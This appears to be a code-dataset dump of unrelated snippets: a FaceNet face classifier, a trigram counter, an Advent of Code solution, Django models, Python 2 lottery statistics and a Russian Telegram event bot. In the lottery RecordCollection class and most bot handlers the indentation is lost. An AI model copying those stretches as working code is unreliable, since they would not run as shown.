    serving = drv()
    serving.load_model(
        args.model,
        inputs='input:0,phase_train:0',
        outputs='embeddings:0',
        device=args.device,
    )
    # Run forward pass to calculate embeddings
    print('Calculating features for images')
    nrof_images = len(paths)
    nrof_batches_per_epoch = int(math.ceil(1.0 * nrof_images / args.batch_size))
    # 512 is the facenet embedding dimensionality
    emb_array = np.zeros((nrof_images, 512))
    for i in range(nrof_batches_per_epoch):
        start_index = i * args.batch_size
        end_index = min((i + 1) * args.batch_size, nrof_images)
        paths_batch = paths[start_index:end_index]
        for j in range(end_index - start_index):
            print('Batch {} <-> {}'.format(paths_batch[j], labels[start_index + j]))
        images = facenet.load_data(paths_batch, False, False, args.image_size)
        if serving.driver_name == 'tensorflow':
            feed_dict = {'input:0': images, 'phase_train:0': False}
        elif serving.driver_name == 'openvino':
            input_name = list(serving.inputs.keys())[0]
            # Transpose image for channel first format
            images = images.transpose([0, 3, 1, 2])
            feed_dict = {input_name: images}
        else:
            raise RuntimeError('Driver %s currently not supported' % serving.driver_name)
        outputs = serving.predict(feed_dict)
        emb_array[start_index:end_index, :] = list(outputs.values())[0]
    classifier_filename_exp = os.path.expanduser(args.classifier_filename)
    if args.mode == 'TRAIN':
        # Train classifier
        print('Training classifier')
        model = svm.SVC(kernel='linear', probability=True)
        model.fit(emb_array, labels)
        # Create a list of class names
        class_names = [cls.name.replace('_', ' ') for cls in dataset]
        print('Classes:')
        print(class_names)
        # Saving classifier model
        with open(classifier_filename_exp, 'wb') as outfile:
            # protocol=2 keeps the pickle loadable from Python 2 tooling
            pickle.dump((model, class_names), outfile, protocol=2)
        print('Saved classifier model to file "%s"' % classifier_filename_exp)
    elif args.mode == 'CLASSIFY':
        # Classify images
        print('Testing classifier')
        with open(classifier_filename_exp, 'rb') as infile:
            (model, class_names) = pickle.load(infile)
        print('Loaded classifier model from file "%s"' % classifier_filename_exp)
        predictions = model.predict_proba(emb_array)
        best_class_indices = np.argmax(predictions, axis=1)
        best_class_probabilities = predictions[np.arange(len(best_class_indices)), best_class_indices]
        for i in range(len(best_class_indices)):
            print('%4d  %s: %.3f' % (i, class_names[best_class_indices[i]], best_class_probabilities[i]))
        accuracy = np.mean(np.equal(best_class_indices, labels))
        update_data({'accuracy': accuracy}, use_mlboard, mlboard)
        print('Accuracy: %.3f' % accuracy)
        if args.upload_model and accuracy >= args.upload_threshold:
            timestamp = datetime.datetime.now().strftime('%s')
            model_name = 'facenet-classifier'
            version = '1.0.0-%s-%s' % (args.driver, timestamp)
            print('Uploading model as %s:%s' % (model_name, version))
            upload_model(
                use_mlboard,
                mlboard,
                classifier_filename_exp,
                model_name,
                version
            )
def split_dataset(dataset, min_nrof_images_per_class, nrof_train_images_per_class):
    """Split each class into train/test subsets.

    Classes with fewer than min_nrof_images_per_class images are dropped.
    Image paths are shuffled in place, then the first
    nrof_train_images_per_class go to the training set and the remainder to
    the test set.
    """
    train_set, test_set = [], []
    for cls in dataset:
        paths = cls.image_paths
        if len(paths) < min_nrof_images_per_class:
            # Remove classes with less than min_nrof_images_per_class
            continue
        np.random.shuffle(paths)
        train_set.append(facenet.ImageClass(cls.name, paths[:nrof_train_images_per_class]))
        test_set.append(facenet.ImageClass(cls.name, paths[nrof_train_images_per_class:]))
    return train_set, test_set
def parse_arguments(argv):
    """Define and parse the command-line interface of this script."""
    p = argparse.ArgumentParser()
    # positional arguments
    p.add_argument('mode', type=str, choices=['TRAIN', 'CLASSIFY'], default='CLASSIFY',
                   help='Indicates if a new classifier should be trained or a classification ' +
                        'model should be used for classification')
    p.add_argument('data_dir', type=str,
                   help='Path to the data directory containing aligned LFW face patches.')
    p.add_argument('model', type=str,
                   help='Path to .xml openVINO IR file')
    p.add_argument('classifier_filename',
                   help='Classifier model file name as a pickle (.pkl) file. ' +
                        'For training this is the output and for classification this is an input.')
    # optional switches
    p.add_argument('--use_split_dataset', action='store_true',
                   help='Indicates that the dataset specified by data_dir should be split into a training and test set. ' +
                        'Otherwise a separate test set can be specified using the test_data_dir option.')
    p.add_argument('--device', default="MYRIAD", choices=["CPU", "MYRIAD"],
                   help='Device for openVINO.')
    p.add_argument('--driver', default="tensorflow",
                   help='Driver for inference.')
    p.add_argument('--batch_size', type=int, default=1,
                   help='Number of images to process in a batch.')
    p.add_argument('--image_size', type=int, default=160,
                   help='Image size (height, width) in pixels.')
    p.add_argument('--min_nrof_images_per_class', type=int, default=20,
                   help='Only include classes with at least this number of images in the dataset')
    p.add_argument('--nrof_train_images_per_class', type=int, default=10,
                   help='Use this number of images from each class for training and the rest for testing')
    p.add_argument('--upload-threshold', type=float, default=0.9,
                   help='Threshold for uploading model')
    p.add_argument('--upload-model', action='store_true', default=False)
    return p.parse_args(argv)
if __name__ == '__main__':
main(parse_arguments(sys.argv[1:]))
|
import sys

# Count every ordered triple of distinct words on each line of the input
# file (argv[1]) and write each triple with its relative frequency to the
# output file (argv[2]).
tempdict = {}
with open(sys.argv[1], "r") as infile:
    lines = infile.readlines()
counter = 0
for line in lines:
    # rstrip only removes the newline; the old line[:-1] chopped a real
    # character off the last line when the file had no trailing newline
    words = line.rstrip("\n").split(" ")
    for a in words:
        for b in words:
            for c in words:
                if a != b and a != c and b != c:
                    key = a + " " + b + " " + c
                    tempdict[key] = tempdict.get(key, 0) + 1
                    counter += 1
with open(sys.argv[2], "w") as outfile:
    outfile.write("Trigram\t\tP(N)\n\n")
    for key in tempdict.keys():
        outfile.write(str(key))
        outfile.write("\t\t")
        value = float(tempdict[key]) / counter
        outfile.write(str(value))
        outfile.write("\n")
|
984,661 | 94b7f06265514622c10aef167084953302a67b28 | from aocd.models import Puzzle
puzzle = Puzzle(year=2022, day=2)
# Decode table for the opponent column and the scoring tables:
# shape score (R/P/S = 1/2/3) plus which shape beats / loses to which.
abc_map = {"A": "R", "B": "P", "C": "S"}
score_map = {"R": 1, "P": 2, "S": 3}
how_to_win_map = {"R": "P", "P": "S", "S": "R"}
how_to_lose_map = {"R": "S", "P": "R", "S": "P"}

def get_total_score(inp):
    """Score the strategy guide where X/Y/Z mean lose/draw/win
    (Advent of Code 2022, day 2, part 2)."""
    total_score = 0
    for round_line in inp.split("\n"):
        opp_code, outcome = round_line.split(" ")
        opp_shape = abc_map[opp_code]
        if outcome == "X":
            # we must lose: no outcome bonus
            my_shape = how_to_lose_map[opp_shape]
        elif outcome == "Y":
            # draw: mirror their shape
            my_shape = opp_shape
            total_score += 3
        elif outcome == "Z":
            # win
            my_shape = how_to_win_map[opp_shape]
            total_score += 6
        else:
            raise Exception(f"Invalid desired outcome {outcome}")
        total_score += score_map[my_shape]
    return total_score
print(get_total_score(puzzle.input_data))
|
def leiaint(mensagem):
    """Prompt with *mensagem* until the user types a valid non-negative
    integer, then return it as an int.

    Invalid input prints a red error message and re-prompts.
    """
    while True:
        numero = str(input(mensagem))
        if numero.isnumeric():
            return int(numero)
        print("\033[0:31mErro! Informe um numero inteiro valido.\033[m")
def linha(tam=45):
    """Return a horizontal divider made of `tam` dashes."""
    return tam * '-'
def cabeçalho(txt):
    """Print `txt` centered between two divider lines."""
    for piece in (linha(), txt.center(42), linha()):
        print(piece)
def menu(Lista):
    """Render the main menu from `Lista` and return the user's choice."""
    cabeçalho("MENU PRINCIPAL")
    # number the options starting at 1, yellow index / green label
    for contador, item in enumerate(Lista, start=1):
        print(f'\033[33m{contador}\033[m - \033[32m{item}\033[m')
    print(linha())
    return leiaint("\033[36mSua Opção:\033[m")
|
984,663 | 0d9584c8ea15ccdb12462f4d917f01445b7758db | from django.db import models
from django_extensions.db.models import TimeStampedModel
# Create your models here.
class Position(TimeStampedModel):
    """A geographic point (longitude/latitude) with created/modified
    timestamps from TimeStampedModel."""
    id = models.AutoField(primary_key=True)
    # max_length is meaningless on FloatField and was dropped
    lng = models.FloatField(null=False, blank=False)
    lat = models.FloatField(null=False, blank=False)

    def __str__(self):
        return str(self.id)
class City(TimeStampedModel):
    """A named city located at a Position."""
    id = models.AutoField(primary_key=True)
    city_name = models.CharField(null=False, blank=False, max_length=25)
    # on_delete is required since Django 2.0; CASCADE matches the old
    # implicit default behavior
    pos = models.ForeignKey(Position, on_delete=models.CASCADE)

    def __str__(self):
        return str(self.city_name)
984,664 | 659e4aaf0ef2cdc4f04a3b5fcf238ad76f5a0d76 | #!usr/bin/python
# encoding: utf-8
__all__ = ['Record','RecordCollection','FileReader','Stats']
from constants import *
# 03001 10 11 12 13 26 28 11 10307806 0 0 898744 1 2003-2-20 2003-2-23
class Record:
    """One lottery draw: id, six red balls (n1-n6), one blue ball (n7),
    prize/sales figures and the draw's date range.

    Derived statistics (sums, odd/even patterns, prime counts, zone counts,
    shifts and width) are computed eagerly at construction time.
    """
    def __init__(self,parts):
        # parts: the 15 whitespace-separated fields of one input line
        self.__init(parts)
        self.__stats()
        #print self.str()
        #print self.stats_str()
    def __init(self,parts):
        """Parse the raw string fields into typed attributes."""
        self.id = parts[0]
        self.n1 = int(parts[1])
        self.n2 = int(parts[2])
        self.n3 = int(parts[3])
        self.n4 = int(parts[4])
        self.n5 = int(parts[5])
        self.n6 = int(parts[6])
        self.n7 = int(parts[7])
        self.total_money = int(parts[8])
        self.one_money = int(parts[9])
        self.one_count = int(parts[10])
        self.two_money = int(parts[11])
        self.two_count = int(parts[12])
        self.start_date = parts[13]
        self.end_date = parts[14]
    def __stats(self):
        """Compute all derived statistics."""
        self.__stats_red_blue()
        self.__stats_red()
    def __stats_red_blue(self):
        """Sums, odd/even 0-1 strings, prime counts and zone counts for the
        red and blue balls."""
        self.red_sum = 0
        self.blue_sum = 0
        # '0'/'1' per ball: even -> '0', odd -> '1'
        self.red_01_str = ""
        self.blue_01_str = ""
        self.red_01_count = (0,0)
        self.blue_01_count = (0,0)
        self.red_prim_count = 0
        self.blue_prim_count = 0
        # 1-11, 12-22,23-33
        self.red_3zone_count = (0,0,0)
        # 1-8, 9-16
        self.blue_2zone_count = (0,0)
        # get stats
        # red
        red_list = [self.n1,self.n2,self.n3,self.n4,self.n5,self.n6]
        c0 = 0
        c1 = 0
        prim = 0
        for n in red_list:
            self.red_sum += n
            if n%2==0:
                self.red_01_str += '0'
                c0 += 1
            else:
                self.red_01_str += '1'
                c1 += 1
            # red prim
            if n in RED_PRIM_LIST:
                prim += 1
        self.red_01_count = (c0,c1)
        self.red_prim_count = prim
        # blue (a single ball, but kept as a list for symmetry with red)
        blue_list = [self.n7]
        c0 = 0
        c1 = 0
        prim = 0
        for n in blue_list:
            self.blue_sum += n
            if n%2==0:
                self.blue_01_str += '0'
                c0 += 1
            else:
                self.blue_01_str += '1'
                c1 += 1
            # blue prim
            if n in BLUE_PRIM_LIST:
                prim += 1
        self.blue_01_count = (c0,c1)
        self.blue_prim_count = prim
        # zone stats
        # red
        zone1 = 0
        zone2 = 0
        zone3 = 0
        for n in red_list:
            if n>=RED_ZONE1[0] and n<=RED_ZONE1[1]:
                zone1 +=1
            elif n>=RED_ZONE2[0] and n<=RED_ZONE2[1]:
                zone2 +=1
            elif n>=RED_ZONE3[0] and n<=RED_ZONE3[1]:
                zone3 +=1
        self.red_3zone_count = (zone1,zone2,zone3)
        # blue
        zone1 = 0
        zone2 = 0
        for n in blue_list:
            if n>=BLUE_ZONE1[0] and n<=BLUE_ZONE1[1]:
                zone1 +=1
            elif n>=BLUE_ZONE2[0] and n<=BLUE_ZONE2[1]:
                zone2 +=1
        self.blue_2zone_count = (zone1,zone2)
    def __stats_red(self):
        """Red-only statistics: offsets from the first ball and head-tail width."""
        red_list = [self.n1,self.n2,self.n3,self.n4,self.n5,self.n6]
        # (1) red shift to base
        # 2,13,17,20,25,33===>11,15,18,23,31
        self.red_shift_to_base = []
        for n in red_list[1:]:
            self.red_shift_to_base.append(n-red_list[0])
        # (2) red head-tail width
        self.red_width = self.n6-self.n1
        # (3) red delta
        # 2,13,17,20,25,33===> 11,4,3,5,8
    def stats_str(self):
        """Multi-line human-readable summary of the derived statistics."""
        return "<stats>\n [red] sum={0} 01_str={1} 01_count={2} prim={3}\n [blue] sum={4} 01_str={5} 01_count={6} prim={7}\n 3zone = {8}".format(self.red_sum,self.red_01_str,self.red_01_count,self.red_prim_count,
            self.blue_sum,self.blue_01_str,self.blue_01_count,self.blue_prim_count,
            self.red_3zone_count)
    def long_str(self):
        """Full record including money/count fields."""
        return "{0} [{1} {2} {3} {4} {5} {6} {7}] {8} {9} {10} {11} {12} {13} {14}".format(self.id,self.n1,self.n2,self.n3,self.n4,self.n5,self.n6,self.n7,self.total_money,self.one_money,self.one_count,self.two_money,self.two_count,self.start_date,self.end_date)
    def short_str(self):
        """Compact record: id, balls and date range."""
        return "{0} [{1} {2} {3} {4} {5} {6} {7}] {8}/{9}".format(self.id,self.n1,self.n2,self.n3,self.n4,self.n5,self.n6,self.n7,self.start_date,self.end_date)
    def str(self):
        """Like short_str but with zero-padded two-digit ball numbers."""
        return "%s [%02d %02d %02d %02d %02d %02d %02d] %s/%s" % (self.id,self.n1,self.n2,self.n3,self.n4,self.n5,self.n6,self.n7,self.start_date,self.end_date)
    def __str__(self):
        return self.long_str()
class RecordCollection:
def __init__(self):
self.records = []
def get_records(self):
return self.records
def get_record_count(self):
return len(self.records)
def add_record(self,record):
self.records.append(record)
def get_record_by_id(self,id):
# 03088
if(len(id)!=5):
print "Error. invalid id %s".format(id)
return None
for record in self.records:
if id == record.id:
return record
print "Warning. can not find record id =%s".format(id)
return None
"""
querying methods:
return a list of record
"""
def query_by_year(self,year):
# 2003,2009--->03,09
# 2010,2011--->10,11
if(year<START_YEAR or len(str(year))!=4):
print "Error. invalid year {0}".format(year)
return None
str_year = str(year)
year = str_year[-2:]
result = []
for record in self.records:
if (year == record.id[:2]):
result.append(record)
return result
def query_by_year_month(self,year,month):
# 2003,2
# '2003-2-23' '2003-2-27'
if(year<START_YEAR or len(str(year))!=4):
print "Error. invalid year {0}".format(year)
return None
if(month<1 or month>MONTH):
print "Error. invalid month {0}".format(month)
return None
result = []
for record in self.records:
parts = record.end_date.split("-")
if year==int(parts[0]) and month == int(parts[1]) :
result.append(record)
return result
def __x_query_by_date(self,date):
# '2003-9-4'
for record in self.records:
if (date == record.end_date):
return [record]
print "Warning. can not find record id =%s".format(id)
return None
def query_by_year_month_day(self,year,month,day):
# 2003,2,23
# '2003-2-23'
if(year<START_YEAR or len(str(year))!=4):
print "Error. invalid year {0}".format(year)
return None
if(month<1 or month>MONTH):
print "Error. invalid month {0}".format(month)
return None
if(day<1 or day>31):
print "Error. invalid day {0}".format(day)
return None
date = '{0}-{1}-{2}'.format(year,month,day)
return self.__x_query_by_date(date)
def __x_query_by_number_pos_1(self,n):
result = []
for record in self.records:
if n == record.n1 :
result.append(record)
return result
def __x_query_by_number_pos_2(self,n):
result = []
for record in self.records:
if n == record.n2 :
result.append(record)
return result
def __x_query_by_number_pos_3(self,n):
result = []
for record in self.records:
if n == record.n3 :
result.append(record)
return result
def __x_query_by_number_pos_4(self,n):
result = []
for record in self.records:
if n == record.n4 :
result.append(record)
return result
def __x_query_by_number_pos_5(self,n):
result = []
for record in self.records:
if n == record.n5 :
result.append(record)
return result
def __x_query_by_number_pos_6(self,n):
result = []
for record in self.records:
if n == record.n6 :
result.append(record)
return result
def __x_query_by_number_pos_7(self,n):
result = []
for record in self.records:
if n == record.n7 :
result.append(record)
return result
def query_by_number_pos(self,n,pos):
# pos = 1,2,3,4,5,6,7
if(pos<1 or pos>7):
print 'Error. valid pos is 1-7.'
return None
if(pos==7):
if (n>BLUE_MAX_NUMBER):
print "Error. blue number >=%s" % BLUE_MAX_NUMBER
return None
else:
if (n>RED_MAX_NUMBER):
print "Error. red number >=%s" % RED_MAX_NUMBER
return None
methods = {
1:self.__x_query_by_number_pos_1,
2:self.__x_query_by_number_pos_2,
3:self.__x_query_by_number_pos_3,
4:self.__x_query_by_number_pos_4,
5:self.__x_query_by_number_pos_5,
6:self.__x_query_by_number_pos_6,
7:self.__x_query_by_number_pos_7
}
return methods[pos](n)
def save(self,filepath):
with open(filepath,'w') as f:
for record in self.records:
line = "%02d %02d %02d %02d %02d %02d %02d\n" % (record.n1,record.n2,record.n3,record.n4,record.n5,record.n6,record.n7)
f.write(line)
print "generated {0}.".format(filepath)
def query_by_number_list(self,number_list):
if(len(number_list)>7):
print "Error. number list count>7"
return None
result = []
for record in self.records:
list7 = [record.n1,record.n2,record.n3,record.n4,record.n5,record.n6,record.n7]
base_set = set(list7)
query_set = set(number_list)
if query_set.issubset(base_set):
result.append(record)
return result
def test_number(self,n1,n2,n3,n4,n5,n6,n7):
#03056 08 17 21 26 28 29 07 32664536 5000000 1 557563 3 2003-8-31 2003-9-4
#result = query_by_number_list([n1,n2,n3,n4,n5,n6,n7])
for record in self.records:
if (n1==record.n1 and n2==record.n2 and n3==record.n3 and n4==record.n4
and n5==record.n5 and n6==record.n6 and n7==record.n7):
print 'Hit. [{0} {1} {2} {3} {4} {5} {6}] at {7} on {8}'.format(n1,n2,n3,n4,n5,n6,n7,record.id,record.end_date)
return True
print 'NO Hit. [{0} {1} {2} {3} {4} {5} {6}]'.format(n1,n2,n3,n4,n5,n6,n7)
return False
class FileReader:
    """Parses a whitespace-separated draw-results file into a RecordCollection."""
    def __init__(self):
        # field separator used in the input file
        self.sep = ' '
    def process(self,filepath):
        """Read *filepath* line by line; return a RecordCollection, or None
        as soon as a malformed line (wrong field count) is found."""
        rc = RecordCollection()
        for line in open(filepath,'r'):
            parts = line.strip('\n').split(self.sep)
            if(len(parts)!=RECORD_FIELD):
                print "ERROR. record field %d!" % len(parts)
                return None
            record = Record(parts)
            rc.add_record(record)
        return rc
class Stats:
    """Aggregates the per-draw statistics of a whole RecordCollection into
    parallel lists (one entry per record) and can dump each metric series
    to its own file under OUTPUT_FOLDER."""
    def __init__(self,rc):
        self.__init(rc)
    def __init(self,rc):
        # rc: the RecordCollection whose records are aggregated
        self.rc = rc
        # red stats
        self.red_sum_list = []
        self.red_01_str_list = []
        self.red_01_count_list = []
        self.red_prim_count_list = []
        self.red_3zone_count_list = []
        self.__get_red_xxx_list()
        # blue stats
        self.blue_sum_list = []
        self.blue_01_str_list = []
        self.blue_01_count_list = []
        self.blue_prim_count_list = []
        self.blue_2zone_count_list = []
        self.__get_blue_xxx_list()
        # avg avg_e: observed mean vs expected mean of the ball sums
        self.red_sum_avg = self.__avg_list(self.red_sum_list)
        self.blue_sum_avg = self.__avg_list(self.blue_sum_list)
        self.red_sum_avg_e = (RED_MIN_NUMBER + RED_MAX_NUMBER)*RED_COUNT/2.0
        self.blue_sum_avg_e = (BLUE_MIN_NUMBER + BLUE_MAX_NUMBER)*BLUE_COUNT/2.0
        # red only
        # red shift base
        self.red_shift_to_base_list = self.__get_red_shift_to_base_list()
        # red width
        self.red_width_list = self.__get_red_width_list()
        # red/blue prim pair (zip returns a list on Python 2)
        self.prim_count_list = zip(self.red_prim_count_list,self.blue_prim_count_list)
    def __avg_list(self,list):
        """Arithmetic mean of a numeric list; 0.0 for an empty list.

        NOTE(review): the parameter shadows the builtin `list`.
        """
        count = len(list)
        if(count==0):
            return 0.0
        total_sum = 0
        for n in list:
            total_sum += n
        return total_sum*1.0/count
    def __inf(self,filename):
        # input path helper
        return "{0}{1}".format(INPUT_FOLDER,filename)
    def __outf(self,filename):
        # output path helper
        return "{0}{1}".format(OUTPUT_FOLDER,filename)
    def __save_list(self,filename,list):
        """Write one item per line to OUTPUT_FOLDER/filename."""
        filepath = self.__outf(filename)
        with open(filepath,'w') as f:
            for item in list:
                line = str(item)+"\n"
                f.write(line)
        print "saved {0}.".format(filepath)
    def save(self):
        """Dump every computed metric series to its own output file."""
        self.__save_list('red_sum_list',self.red_sum_list)
        self.__save_list('blue_sum_list',self.blue_sum_list)
        self.__save_list('red_01_str_list',self.red_01_str_list)
        self.__save_list('blue_01_str_list',self.blue_01_str_list)
        self.__save_list('red_01_count_list',self.red_01_count_list)
        self.__save_list('blue_01_count_list',self.blue_01_count_list)
        self.__save_list('red_prim_count_list',self.red_prim_count_list)
        self.__save_list('blue_prim_count_list',self.blue_prim_count_list)
        self.__save_list('prim_count_list',self.prim_count_list)
        self.__save_list('red_3zone_count_list',self.red_3zone_count_list)
        self.__save_list('blue_2zone_count_list',self.blue_2zone_count_list)
        # red only
        self.__save_list('red_shift_to_base_list',self.red_shift_to_base_list)
        self.__save_list('red_width_list',self.red_width_list)
    def __get_red_xxx_list(self):
        """Collect the per-record red statistics into the red_*_list attributes."""
        for record in self.rc.get_records():
            self.red_sum_list.append(record.red_sum)
            self.red_01_str_list.append(record.red_01_str)
            self.red_01_count_list.append(record.red_01_count)
            self.red_prim_count_list.append(record.red_prim_count)
            self.red_3zone_count_list.append(record.red_3zone_count)
    def __get_blue_xxx_list(self):
        """Collect the per-record blue statistics into the blue_*_list attributes."""
        for record in self.rc.get_records():
            self.blue_sum_list.append(record.blue_sum)
            self.blue_01_str_list.append(record.blue_01_str)
            self.blue_01_count_list.append(record.blue_01_count)
            self.blue_prim_count_list.append(record.blue_prim_count)
            self.blue_2zone_count_list.append(record.blue_2zone_count)
    def get_red_sum_avg_e(self):
        return self.red_sum_avg_e
    def get_red_sum_avg(self):
        return self.red_sum_avg
    def get_blue_sum_avg_e(self):
        return self.blue_sum_avg_e
    def get_blue_sum_avg(self):
        return self.blue_sum_avg
    # red shift to base: per-record offsets of balls 2-6 from ball 1
    def __get_red_shift_to_base_list(self):
        self.red_shift_to_base_list = []
        for record in self.rc.get_records():
            self.red_shift_to_base_list.append(record.red_shift_to_base)
        return self.red_shift_to_base_list
    # red width: per-record spread between highest and lowest red ball
    def __get_red_width_list(self):
        self.red_width_list = []
        for record in self.rc.get_records():
            self.red_width_list.append(record.red_width)
        return self.red_width_list
|
984,665 | c9600fbea1ebd68a2e6337d00133aa78b90c5fb5 | import ast
from cgi import log
import requests
import telebot
import constants1 as constants
from telebot import types
from choice import choice_main, location_search, users_count
sm = u'\U0001F603'
sm1 = u'\U0001F601'
bot = telebot.TeleBot(constants.token)
@bot.message_handler(commands=['help'])
def handle_text(message):
    """Send the static help text in reply to /help."""
    bot.send_message(message.chat.id, constants.helpAnswer)
    log(message, constants.helpAnswer)
@bot.message_handler(commands=['start', 'Начать'])
def handle_start(message):
    """Show the two top-level choices: nearby events or all events."""
    markup = types.ReplyKeyboardMarkup()
    markup.row('/События рядом')
    markup.row('/Все события')
    bot.send_message(message.chat.id, "Выберите категорию", reply_markup=markup)
@bot.message_handler(commands=["События"])
def request_location(message):
# Эти параметры для клавиатуры необязательны, просто для удобства
keyboard = types.ReplyKeyboardMarkup(row_width=2, resize_keyboard=True)
button_geo = types.KeyboardButton(text="Отправить местоположение", request_location=True)
keyboard.add(button_geo)
bot.send_message(message.chat.id, "Нам нужно ваше местоположение", reply_markup=keyboard)
@bot.message_handler(content_types=['location'])
def location(message):
    """Search for events near the shared coordinates and send them back.

    location_search returns either a plain string (an error/notice to relay
    verbatim) or a list of event dicts.
    """
    bot.send_message(message.chat.id, 'Подождите...Ищем события... ')
    lat = (ast.literal_eval(str(message.location))["latitude"])
    lon = (ast.literal_eval(str(message.location))["longitude"])
    answer = location_search(lat, lon)
    # the type check is loop-invariant, so decide once up front
    if isinstance(answer, str):
        reply_text = answer
    else:
        reply_text = ""
        for event in answer:
            try:
                part = "\n" + event["title"] + "\n" + event[
                    "content"] + "\n" + "Начало события: " + \
                    event[
                        "start"] + "\n" + "Конец события: " + event["end"] + "\n" + event[
                    "url"]
            except KeyError:
                # some events have no start time
                part = "\n" + event["title"] + "\n" + event[
                    "content"] + "\n" + event["end"] + "\n" + event[
                    "url"]
            reply_text += part
    bot.send_message(message.chat.id, reply_text)
    keyboard = types.ReplyKeyboardMarkup(resize_keyboard=1)
    keyboard.add(types.KeyboardButton('/Начать сначала'))
    bot.send_message(message.chat.id, sm + 'Мы всегда рады помочь Вам!', reply_markup=keyboard)
@bot.message_handler(commands=['Все'])
def handle_start(message):
    """Show the full category menu for the 'all events' flow.

    NOTE(review): several handlers in this file share the name handle_start;
    registration still works via the decorator, but distinct names would
    aid debugging.
    """
    markup = types.ReplyKeyboardMarkup()
    markup.row('/Квесты', '/Концерты')
    markup.row('/Стендап', '/Фестивали')
    markup.row('/Знания', '/Выставки')
    markup.row('/Ярмарки', '/Дети')
    markup.row('/Постоянные выставки')
    bot.send_message(message.chat.id, constants.startAnswer, reply_markup=markup)
    log(message, constants.startAnswer)
@bot.message_handler(commands=['Квесты'])
def handle_start(message):
markup1 = types.ReplyKeyboardMarkup(row_width=2)
m1 = types.KeyboardButton('/Платное')
m2 = types.KeyboardButton('/Бесплатное')
m3 = types.KeyboardButton('/Не имеет значения')
markup1.add(m1, m2, m3)
bot.send_message(message.chat.id, "Выберите тип события", reply_markup=markup1)
global text
text = message.text
@bot.message_handler(commands=['Концерты'])
def handle_start(message):
markup1 = types.ReplyKeyboardMarkup(row_width=2)
m1 = types.KeyboardButton('/Платное')
m2 = types.KeyboardButton('/Бесплатное')
m3 = types.KeyboardButton('/Не имеет значения')
markup1.add(m1, m2, m3)
bot.send_message(message.chat.id, "Выберите тип события", reply_markup=markup1)
global text
text = message.text
@bot.message_handler(commands=['Стендап'])
def handle_start(message):
markup1 = types.ReplyKeyboardMarkup(row_width=2)
m1 = types.KeyboardButton('/Показать события')
markup1.add(m1)
bot.send_message(message.chat.id, 'Данное событие является платным', reply_markup=markup1)
global text
text = message.text
@bot.message_handler(commands=['Фестивали'])
def handle_start(message):
markup1 = types.ReplyKeyboardMarkup(row_width=2)
m1 = types.KeyboardButton('/Платное')
m2 = types.KeyboardButton('/Бесплатное')
m3 = types.KeyboardButton('/Не имеет значения')
markup1.add(m1, m2, m3)
bot.send_message(message.chat.id, "Выберите тип события", reply_markup=markup1)
global text
text = message.text
@bot.message_handler(commands=['Ярмарки'])
def handle_start(message):
markup1 = types.ReplyKeyboardMarkup(row_width=2)
m1 = types.KeyboardButton('/Платное')
m2 = types.KeyboardButton('/Бесплатное')
m3 = types.KeyboardButton('/Не имеет значения')
markup1.add(m1, m2, m3)
bot.send_message(message.chat.id, "Выберите тип события", reply_markup=markup1)
global text
text = message.text
@bot.message_handler(commands=['Постоянные'])
def handle_start(message):
markup1 = types.ReplyKeyboardMarkup(row_width=2)
m1 = types.KeyboardButton('/Платное')
m2 = types.KeyboardButton('/Бесплатное')
m3 = types.KeyboardButton('/Не имеет значения')
markup1.add(m1, m2, m3)
bot.send_message(message.chat.id, "Выберите тип события", reply_markup=markup1)
global text
text = message.text
@bot.message_handler(commands=['Выставки'])
def handle_start(message):
markup1 = types.ReplyKeyboardMarkup(row_width=2)
m1 = types.KeyboardButton('/Платное')
m2 = types.KeyboardButton('/Бесплатное')
m3 = types.KeyboardButton('/Не имеет значения')
markup1.add(m1, m2, m3)
bot.send_message(message.chat.id, "Выберите тип события", reply_markup=markup1)
global text
text = message.text
@bot.message_handler(commands=['Знания'])
def handle_start(message):
    """'Знания' handler: ask for the price type and remember the category."""
    global text
    kb = types.ReplyKeyboardMarkup(row_width=2)
    kb.add(*[types.KeyboardButton(cmd) for cmd in ('/Платное', '/Бесплатное', '/Не имеет значения')])
    bot.send_message(message.chat.id, "Выберите тип события", reply_markup=kb)
    text = message.text
@bot.message_handler(commands=['Дети'])
def handle_start(message):
    """'Дети' handler: ask for the price type and remember the category."""
    global text
    kb = types.ReplyKeyboardMarkup(row_width=2)
    kb.add(*[types.KeyboardButton(cmd) for cmd in ('/Платное', '/Бесплатное', '/Не имеет значения')])
    bot.send_message(message.chat.id, "Выберите тип события", reply_markup=kb)
    text = message.text
@bot.message_handler(commands=['Платное', 'Бесплатное', 'Не', 'Показать'])
def handle_start(message):
    """Final step: search events for the previously chosen category
    (module-level `text`) and send each result to the chat.

    Fix: on a KudaGo read timeout the original fell through to the result
    loop with `dermo` unbound, so the user got a misleading extra
    'unknown error' message; now the user is told to retry and the
    handler returns early.
    """
    try:
        bot.send_message(message.chat.id, 'Подождите...Ищем события...')
        try:
            dermo = choice_main(text)
        except requests.exceptions.ReadTimeout:
            bot.send_message(message.chat.id,
                             'Превышено время ожидания ответа от KudaGo.com...Попробуйте заново через несколько минут')
            keyboard = types.ReplyKeyboardMarkup(resize_keyboard=1)
            keyboard.add(types.KeyboardButton('/Начать сначала'))
            bot.send_message(message.chat.id, 'Попробуйте найти события еще раз', reply_markup=keyboard)
            users_count()
            return
        for i in range(len(dermo)):
            mes = "#" + str(i + 1) + "\n" + dermo[i]["title"] + "\n" + " " + dermo[i][
                "content"] + "\n" + "Смотреть больше:" + dermo[i]["url"]
            bot.send_message(message.chat.id, mes)
        keyboard = types.ReplyKeyboardMarkup(resize_keyboard=1)
        keyboard.add(types.KeyboardButton('/Начать сначала'))
        bot.send_message(message.chat.id, sm + 'Мы всегда рады помочь Вам!', reply_markup=keyboard)
        users_count()
    except NameError:
        # `text` is unbound when the user jumps straight to this command.
        bot.send_message(message.chat.id, "Извините!Произошла неизвестная ошибка..." + sm1)
        keyboard = types.ReplyKeyboardMarkup(resize_keyboard=1)
        keyboard.add(types.KeyboardButton('/Начать сначала'))
        bot.send_message(message.chat.id, 'Попробуйте найти события еще раз', reply_markup=keyboard)
        users_count()
if __name__ == '__main__':
    # Start long polling; none_stop keeps the bot alive across transient errors.
    bot.polling(none_stop=True)
|
984,666 | c7f211e67a8d26e5946fdcc0d7b6ea3f02e58705 | params = {
'vocab_size': 15000,
'embed_dim': 100,
'dropout': 0.5,
'pad_len': 200,
'pad_type': 'post',
'batch_size': 64
}
|
984,667 | 17c7dffe18074974ea764e0387d397e7ed63a831 | #!/usr/bin/env python3
# -*-encoding: utf-8-*-
# author: Valentyn Kofanov
import docx
from docx.shared import RGBColor
